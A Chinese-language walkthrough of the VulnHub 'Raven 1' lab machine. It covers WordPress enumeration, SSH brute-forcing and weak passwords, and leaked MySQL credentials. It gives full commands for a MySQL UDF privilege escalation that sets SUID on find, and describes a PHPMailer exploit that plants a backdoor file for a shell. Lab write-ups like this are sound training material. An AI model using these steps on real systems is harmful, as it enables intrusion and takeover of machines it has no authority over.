仅供个人娱乐
靶机信息
Raven 下载地址:https://www.vulnhub.com/entry/raven-1,256/
一、主机探测
端口信息
目录扫描
80端口
根据页面开始搜寻有用的信息
得到信息
Wpscan漏洞利用
右上角BLOG ,会发现是 WordPress 系统。于是使用 WPScan 进行扫描
wpscan --url http://192.168.204.131/wordpress/ -ep -et -eu
-ep 枚举插件信息
-et 扫描主题
-eu 枚举用户
结果的到wordpress目录 用户等 用户有steven 和michael
发现靶机上的两个用户名:steven 和michael
使用ssh爆破 密码使用rockyou.txt
(重置虚拟机 ip改为 192.168.204.131)
将文件复制到root目录 并且解压
使用弱口令michael/michael 尝试登陆ssh
查看是否能用sudo提权,内核提权等等
一步一步 寻找有用信息
查看wp-config.php,发现mysql用户名以及密码 root/R@v3nSecurity
netstat -anpt
查看开放的端口,发现开放3306
进入数据库
root/R@v3nSecurity
信息收集
cmd5 破解
ssh登录
使用sudo python -c ‘import pty;pty.spawn("/bin/bash")’ 绕过限制,获得管理员权限
mysql udf 提权
ps -ef | grep mysql
ps -ef是以全格式显示当前所有的进程
grep 命令用于查找文件里符合条件的字符串
查看mysql udf漏洞的利用exp
进入kali apache的根目录
将文件复制到html目录
进行编译
gcc -g -c 1518.c
gcc -g -shared -Wl,-soname,1518.so -o 1518.so
靶机切换tmp目录
靶机wget下载 kali编译生成的1518.so
连接数据库
use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select*fromfoo into dumpfile'/usr/lib/mysql/plugin/1518.so';
create function do_system returns integer soname'1518.so';
select*from mysql.func;
selectdo_system('chmod u+s /usr/bin/find');
exit
touch finn
find finn -exec"/bin/sh" ;
whoami
获得权限成功
打开http://192.168.204.131/vendor/
根据网页查找有用信息
searchsploit PHPMailer查看是否有漏洞,发现有漏洞利用脚本
复制到 /root
修改文件
(个人电脑问题,kali安装pip3,pip3 install requests-toolbelt)
脚本更名为 1.py 将脚本放置于/root
cd /root
python3 1.py
访问http://192.168.204.131/contact.php
此时就会生成后门文件backlion.php
接着访问后门文件:http://192.168.204.131/backlion.php
进行监听 获取shell
